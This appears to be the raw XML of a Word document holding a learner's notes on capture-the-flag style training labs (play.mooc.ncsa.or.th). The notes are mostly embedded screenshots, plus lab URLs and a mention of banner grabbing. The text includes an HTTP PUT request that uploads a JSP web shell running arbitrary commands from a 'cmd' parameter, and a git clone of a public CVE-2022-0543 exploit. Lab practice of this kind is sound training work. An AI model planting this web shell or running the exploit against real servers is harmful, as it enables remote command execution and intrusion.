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B23BC36" wp14:paraId="2C4A27F3" wp14:textId="6BFAAAF5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="38482A38">
        <w:rPr/>
        <w:t>105-107</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="7B23BC36" wp14:paraId="2C078E63" wp14:textId="3D697E0B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="38482A38">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="09E849CD">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="193BFADF" wp14:anchorId="70262E34">
            <wp:extent cx="2800350" cy="2800350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1690973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973717" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId82419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03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32287A" w:rsidP="5C4A3528" w:rsidRDefault="3632287A" w14:paraId="6E7B8772" w14:textId="64636A2F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3632287A">
        <w:rPr/>
        <w:t>https://play.mooc.ncsa.or.th/lab/105</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3632287A" w:rsidP="5C4A3528" w:rsidRDefault="3632287A" w14:paraId="782E3008" w14:textId="1E722FDC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3632287A">
        <w:drawing>
          <wp:inline wp14:editId="489A5742" wp14:anchorId="4A2E3BD7">
            <wp:extent cx="4245860" cy="4371975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71273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73085" name="Picture 71273085"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId179694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586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32287A" w:rsidP="5C4A3528" w:rsidRDefault="3632287A" w14:paraId="40ABD405" w14:noSpellErr="1" w14:textId="2BB618E2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3632287A">
        <w:drawing>
          <wp:inline wp14:editId="4ECA5FD6" wp14:anchorId="6696E369">
            <wp:extent cx="5772150" cy="5943600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="189410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10573" name="Picture 189410573"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1537767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32287A" w:rsidP="477F7A40" w:rsidRDefault="3632287A" w14:paraId="295CF7F4" w14:textId="557E2ED5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3632287A">
        <w:drawing>
          <wp:inline wp14:editId="315E4469" wp14:anchorId="42E96356">
            <wp:extent cx="5581650" cy="5943600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="637344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344817" name="Picture 637344817"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1024917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32287A" w:rsidP="477F7A40" w:rsidRDefault="3632287A" w14:paraId="193956A0" w14:textId="5CE1D4FF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3632287A">
        <w:drawing>
          <wp:inline wp14:editId="6CA8D86E" wp14:anchorId="4E9CB466">
            <wp:extent cx="5800725" cy="5943600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="573182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182807" name="Picture 573182807"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1777421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49BB30" w:rsidP="1949BB30" w:rsidRDefault="1949BB30" w14:paraId="0A4D7C4B" w14:noSpellErr="1" w14:textId="2EA1B878">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="774E0073">
        <w:drawing>
          <wp:inline wp14:editId="7183B2D0" wp14:anchorId="5F37B0C2">
            <wp:extent cx="5562600" cy="5943600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="216515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515242" name="Picture 216515242"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId72596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8C9A2" w:rsidP="3E69E017" w:rsidRDefault="72E8C9A2" w14:paraId="42F2F748" w14:textId="01059B63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PUT /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shell.jsp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/ HTTP/1.1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Host: challenge.secplayground.com:11001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User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0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Accept: text/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html,application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/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xhtml+xml,application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/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xml;q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=0.9,*/*;q=0.8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Accept-Language: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en-US,en;q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=0.5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Accept-Encoding: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gzip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, deflate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Cookie: __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cfduid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=dd8465cb7b2c28a4cb6dee2d7096b65fd1546792095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Connection: close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Upgrade-Insecure-Requests: 1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Content-Length: 858</w:t>
      </w:r>
      <w:r>
        <w:br/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&lt;%@ page import="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java.util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.*,java.io.*"%&gt;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&lt;%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//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// JSP_KIT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//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//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cmd.jsp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= Command Execution (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unix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)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//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// by: Unknown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// modified: 27/06/2003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//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%&gt;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&lt;HTML&gt;&lt;BODY&gt;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&lt;FORM METHOD="GET" NAME="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myform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" ACTION=""&gt;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&lt;INPUT TYPE="text" NAME="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cmd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"&gt;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&lt;INPUT TYPE="submit" VALUE="Send"&gt;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&lt;/FORM&gt;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&lt;pre&gt;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&lt;%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if (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request.getParameter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("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cmd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") != null) {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out.println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("Command: " +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request.getParameter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("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cmd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") + "&lt;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br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&gt;");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Process p =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Runtime.getRuntime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().exec(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request.getParameter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("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cmd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"));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OutputStream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os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=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p.getOutputStream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();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InputStream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in =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p.getInputStream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();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DataInputStream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dis = new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DataInputStream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(in);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String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disr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=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dis.readLine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();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while (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disr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!= null ) {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out.println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(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disr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);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disr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= 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dis.readLine</w:t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();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}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}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%&gt;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&lt;/pre&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3E69E017" w:rsidR="4A88B971">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="774E0073" w:rsidP="72E8C9A2" w:rsidRDefault="774E0073" w14:paraId="1F8ECC06" w14:textId="4D441A3B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="774E0073">
        <w:drawing>
          <wp:inline wp14:editId="50D2710F" wp14:anchorId="7BFFA45C">
            <wp:extent cx="3280374" cy="3597458"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="864069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069600" name="Picture 864069600"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId714098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0374" cy="359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8C9A2" w:rsidP="72E8C9A2" w:rsidRDefault="72E8C9A2" w14:paraId="1A8FBBE6" w14:textId="451C129A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="774E0073">
        <w:drawing>
          <wp:inline wp14:editId="569CAAEB" wp14:anchorId="596CC36F">
            <wp:extent cx="3542785" cy="3281618"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="362588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588342" name="Picture 362588342"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId28344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2785" cy="328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C321EE">
        <w:drawing>
          <wp:inline wp14:editId="0D9B0312" wp14:anchorId="2A9F0FF5">
            <wp:extent cx="5753903" cy="4372585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="244791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791820" name="Picture 244791820"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId767480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8C9A2" w:rsidP="72E8C9A2" w:rsidRDefault="72E8C9A2" w14:paraId="0F2250CD" w14:textId="6FF42E8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E8C9A2" w:rsidP="72E8C9A2" w:rsidRDefault="72E8C9A2" w14:paraId="029F12AD" w14:textId="2A46DE20">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="33263806">
        <w:rPr/>
        <w:t>https://play.mooc.ncsa.or.th/lab/106</w:t>
      </w:r>
      <w:r w:rsidR="33263806">
        <w:drawing>
          <wp:inline wp14:editId="60103E78" wp14:anchorId="6E508F24">
            <wp:extent cx="4525936" cy="4373621"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1832286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286077" name="Picture 1832286077"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1290375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5936" cy="437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263806">
        <w:drawing>
          <wp:inline wp14:editId="16C7AF6C" wp14:anchorId="3EFE1024">
            <wp:extent cx="4090508" cy="3297316"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112960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60651" name="Picture 112960651"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1202815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0508" cy="32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263806">
        <w:drawing>
          <wp:inline wp14:editId="529DED5B" wp14:anchorId="55579E32">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1858298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298259" name="Picture 1858298259"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1024161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8C9A2" w:rsidP="72E8C9A2" w:rsidRDefault="72E8C9A2" w14:paraId="469ADBB8" w14:textId="4663503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CF9A93" w:rsidP="1949BB30" w:rsidRDefault="76CF9A93" w14:paraId="1B47DDDD" w14:textId="1A432B36">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="1949BB30" w:rsidR="76CF9A93">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>banner grabbing</w:t>
      </w:r>
      <w:r w:rsidRPr="1949BB30" w:rsidR="1E02A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E02A56F" w:rsidP="1949BB30" w:rsidRDefault="1E02A56F" w14:paraId="65CAF458" w14:textId="1BE27219">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="1949BB30" w:rsidR="1E02A56F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://play.mooc.ncsa.or.th/lab/82</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1E02A56F" w:rsidP="1949BB30" w:rsidRDefault="1E02A56F" w14:paraId="260529AC" w14:textId="345E5E42">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1E02A56F">
        <w:drawing>
          <wp:inline wp14:editId="5704BFD0" wp14:anchorId="7356D5A3">
            <wp:extent cx="4201111" cy="3591426"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106361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61523" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId13183795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CAF0F" w:rsidP="3E69E017" w:rsidRDefault="55DCAF0F" w14:paraId="45A728A1" w14:textId="06080039">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="55DCAF0F">
        <w:rPr/>
        <w:t>https://play.mooc.ncsa.or.th/lab/107</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="55DCAF0F" w:rsidP="3E69E017" w:rsidRDefault="55DCAF0F" w14:paraId="239C3A94" w14:textId="31F9B65D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="55DCAF0F">
        <w:rPr/>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="R79107f247a4e41ab">
        <w:r w:rsidRPr="3E69E017" w:rsidR="55DCAF0F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/0x7eTeam/CVE-2022-0543.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="55DCAF0F" w:rsidP="3E69E017" w:rsidRDefault="55DCAF0F" w14:paraId="608652FF" w14:textId="510FFC68">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="55DCAF0F">
        <w:drawing>
          <wp:inline wp14:editId="14F07331" wp14:anchorId="077789DE">
            <wp:extent cx="5943600" cy="5105400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1426504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6504391" name="Picture 1426504391"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId649542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E547D" w:rsidP="1949BB30" w:rsidRDefault="2A3E547D" w14:paraId="3FAC2ADE" w14:textId="64E6252C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A3E547D">
        <w:rPr/>
        <w:t>https://play.mooc.ncsa.or.th/lab/83</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A3E547D" w:rsidP="1949BB30" w:rsidRDefault="2A3E547D" w14:paraId="05165389" w14:textId="0E7CEA20">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A3E547D">
        <w:drawing>
          <wp:inline wp14:editId="2F9F8809" wp14:anchorId="09C5B622">
            <wp:extent cx="5943600" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38324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24273" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1627208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3C33F9">
        <w:rPr/>
        <w:t>https://play.mooc.ncsa.or.th/lab/84</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E199656" w:rsidP="1949BB30" w:rsidRDefault="6E199656" w14:paraId="23FC2E1A" w14:textId="739856E2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6E199656">
        <w:drawing>
          <wp:inline wp14:editId="17FF55B0" wp14:anchorId="00DF5C9F">
            <wp:extent cx="5943600" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="676013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013853" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId5257897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F45640"/>
    <w:rsid w:val="04353395"/>
    <w:rsid w:val="09E849CD"/>
    <w:rsid w:val="0A513A7D"/>
    <w:rsid w:val="17DC7D5D"/>
    <w:rsid w:val="1949BB30"/>
    <w:rsid w:val="1DF12D8D"/>
    <w:rsid w:val="1E02A56F"/>
    <w:rsid w:val="25F328A2"/>
    <w:rsid w:val="2A3E547D"/>
    <w:rsid w:val="3298DED7"/>
    <w:rsid w:val="33263806"/>
    <w:rsid w:val="354BC5AE"/>
    <w:rsid w:val="3632287A"/>
    <w:rsid w:val="38482A38"/>
    <w:rsid w:val="38A19B79"/>
    <w:rsid w:val="3B5CF007"/>
    <w:rsid w:val="3E69E017"/>
    <w:rsid w:val="477F7A40"/>
    <w:rsid w:val="4A88B971"/>
    <w:rsid w:val="4B1F65BA"/>
    <w:rsid w:val="4B3C33F9"/>
    <w:rsid w:val="4FF45640"/>
    <w:rsid w:val="55DCAF0F"/>
    <w:rsid w:val="57CE296C"/>
    <w:rsid w:val="5C4A3528"/>
    <w:rsid w:val="603E9F68"/>
    <w:rsid w:val="63909C4D"/>
    <w:rsid w:val="6E199656"/>
    <w:rsid w:val="6E66BCFF"/>
    <w:rsid w:val="72E8C9A2"/>
    <w:rsid w:val="76CF9A93"/>
    <w:rsid w:val="774E0073"/>
    <w:rsid w:val="79903253"/>
    <w:rsid w:val="7B23BC36"/>
    <w:rsid w:val="7BC321EE"/>
    <w:rsid w:val="7F2DD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45640"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{67B48094-1338-493E-9BAE-136DCED453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E69E01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419240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="rId1318379543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="rId1627208229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="rId525789740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="rId179694688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="rId1537767767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="rId1024917861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="rId1777421364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="rId72596437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="rId714098004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="rId28344980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="rId767480478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="rId1290375941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="rId1202815637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="rId1024161245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0x7eTeam/CVE-2022-0543.git" TargetMode="External" Id="R79107f247a4e41ab" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="rId6495424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aae77042f5a1f4aca2c1849db70f2ff6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0b7c111eef281580fe8d60d0869af1d0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B65FB6C0-8509-4843-8B2D-B48DAFA5B55A}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FE19BEBD-8BAA-4EB7-B763-818239E993C3}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{929A4291-905C-485D-9F79-B4F3CF24E77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aphiwit bunlom</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>aphiwit bunlom</lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-16T08:24:22.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-22T11:33:31.4479904Z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  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>